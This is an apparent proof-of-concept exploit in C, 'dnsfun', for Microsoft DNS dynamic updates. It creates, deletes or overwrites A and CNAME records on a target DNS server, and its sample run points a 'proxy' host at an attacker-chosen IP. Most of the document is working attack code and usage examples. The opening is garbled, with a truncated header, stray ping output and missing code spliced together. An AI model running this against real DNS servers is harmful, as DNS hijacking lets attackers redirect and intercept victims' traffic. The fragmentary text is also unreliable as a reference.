Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit


/*
Exploiting Microsoft DNS Dynamic Updates for Fun and profit
Andres Tarasco Acuña - (c) 2007
Url: http://
Haciendo ping a FakeProxy.fooooo.com [66.6.66.6] con 32 bytes de datos:

D:\DNSfun>dnsfun.exe -s 10.100.1.1 -q proxy.mydomain -u 66.6.66.6
Microsoft Dynamic DNS Updates - Proof of Concept
http:// -u ( resolved as CNAME /en-us/library/ms682007.aspx
if (Credentials->UserLength==0) {
status=DnsAcquireContextHandle(FALSE,NULL,&ContextHandle); //Context with default Credentials
} else {
status=DnsAcquireContextHandle(FALSE,Credentials,&ContextHandle); //Context with Custom Credentials
}

if (status == ERROR_SUCCESS) {
if (CREATERECORD) {

result=(PDNS_RECORDA)malloc(sizeof(DNS_RECORDA));
memset(result,'\0',sizeof(DNS_RECORDA));
result->wType=CreationType; //DNS_TYPE_A by default
if (CreationType==DNS_TYPE_CNAME) {
printf("[ ] Creating DNS CName Record for %s (%s)\n",CreateDnsRecord,NewIpAddress);
result->Data.Cname.pNameHost=NewIpAddress;
} else {
printf("[ ] Creating DNS A Record for %s (%s)\n",CreateDnsRecord,NewIpAddress);
result->Data.A.IpAddress=inet_addr(NewIpAddress);
}
result->pName=CreateDnsRecord;
result->wDataLength=4;
result->Flags.S.Section=1;
result->Flags.S.CharSet=DnsCharSetAnsi;
result->pNext=NULL;
status=DnsModifyRecordsInSet_A(result, //add record
NULL, //delete record
Options,
ContextHandle,
servers,
NULL);
if (status ==ERROR_SUCCESS) {
printf("[ ] Host Created. Rechecking Record...\n");
DnsRecordListFree(result,DnsFreeRecordList);
result=DnsQueryA(CreateDnsRecord,servers);
} else {
printf("[-] Error: Unable to create %s (%i)\n",CreateDnsRecord,status);
}
} else if (DELETERECORD) {
printf("[ ] Trying to resolve Host: %s before deleting\n",DeleteDnsRecord);
result=DnsQueryA(DeleteDnsRecord,servers);
if (result!=NULL) {
printf("[ ] Trying to Delete Record. Are You Sure? (Y/N)...");
i=getchar(); if (i!='y') return(-1);
printf("[ ] Deleting record %s\n",DeleteDnsRecord);
status=DnsModifyRecordsInSet_A(NULL, //add record
result, //delete record
Options,
ContextHandle,
servers,
NULL);
if (status ==ERROR_SUCCESS) {
printf("[ ] Host Deleted. Rechecking Record %s...\n",DeleteDnsRecord);
DnsRecordListFree(result,DnsFreeRecordList);
result=DnsQueryA(DeleteDnsRecord,servers);
} else {
printf("[-] Error: Unable to Delete %s\n",DeleteDnsRecord);
}
} else {
printf("[-] Host %s not found\n",DeleteDnsRecord);
}
} else if (UPDATERECORD) {
// exit(1);
printf("[ ] Trying to resolve Host: %s before updating\n",TargetDnsRecord);
result=DnsQueryA(TargetDnsRecord,servers);
if (result->wType==DNS_TYPE_A ) {
printf("[ ] Trying to update record. Are You Sure? (Y/N)...");
i=getchar(); if (i!='y') return(-1);
result->Data.A.IpAddress=inet_addr(NewIpAddress);//Modify Dns record
ipaddr.S_un.S_addr = (result->Data.A.IpAddress);
printf("[ ] Trying to set ip address of the host %s to %s \n", TargetDnsRecord,NewIpAddress);//inet_ntoa(ipaddr));
printf("[ ] Trying to Modify Record...\n");
status=DnsReplaceRecordSetA(result,
Options, //Attempts nonsecure dynamic update. If refused, then attempts secure dynamic update.
ContextHandle,
servers,//pServerList,
NULL);//pReserved
if (status ==ERROR_SUCCESS) {
printf("[ ] Host Updated. Rechecking Record...\n");
DnsRecordListFree(result,DnsFreeRecordList);
result=DnsQueryA(TargetDnsRecord,servers);
} else {
printf("[-] Error: Unable to Delete %s\n",TargetDnsRecord);
}
} else {
printf("[-] Unable to Update Record (Type %x)\n",result->wType);
}
} else if (QUERYRECORD) {
printf("[ ] Query Information for host %s...\n",TargetDnsRecord);
result=DnsQueryA(TargetDnsRecord,servers);
DnsRecordListFree(result,DnsFreeRecordList);
} else {
printf("[-] Unknown Options\n");
return(-1);
}
} else {
printf("[-] Error Calling DnsAcquireContextHandle\n");
}
return (1);
}
/****************************************************************************/
/*
 * Print dnsfun's command-line help to stdout and terminate the process.
 *
 * argv: the program's argument vector. Only argv[0] (the program name) is
 *       read; it prefixes every usage line.
 *
 * Never returns: the function ends with exit(0). The exit status is 0 even
 * though usage() is the "bad arguments" path, so a caller (e.g. a script)
 * cannot tell a usage error from a successful run by the status alone.
 */
void usage(char *argv[]) {
	const char *prog = argv[0];

	/* Synopsis. */
	fputs(" Usage:\n", stdout);
	printf("\t%s\t -[s]d|c|q[u] \n", prog);

	/* Per-option details, one line each; all lines carry the program name. */
	fputs(" Details:\n", stdout);
	printf("\t%s\t -s ip (dns Server (optional))\n"
	       "\t%s\t -d fqdn (Delete dns record)\n"
	       "\t%s\t -q fqdn (Query dns record)\n"
	       "\t%s\t -c[a|c] ip (Create A or CName record (default A))\n"
	       "\t%s\t -u ip|fqdn (Update dns record (requires -q or -c))\n",
	       prog, prog, prog, prog, prog);

	/* Worked examples for update, delete, create (A and CNAME) and SRV query. */
	fputs("\n Examples:\n", stdout);
	printf("\t%s -s 10.0.0.1 -q proxy.mydomain.com -u 5.1.4.77 (Updates record)\n"
	       "\t%s -s 10.0.0.1 -d foo.mydomain.com (delete foo.mydomain.com record)\n"
	       "\t%s -s 10.0.0.1 -c atarasco.foo.mydomain.com -u 5.14.7.7 (creates record)\n"
	       "\t%s -s 10.0.0.1 -cc -u 5.14.7.7 (creates record)\n"
	       "\t%s -s 10.0.0.1 -q _ldap._tcp.mydomain (Query for srv record)\n",
	       prog, prog, prog, prog, prog);

	exit(0);
}
/****************************************************************************/

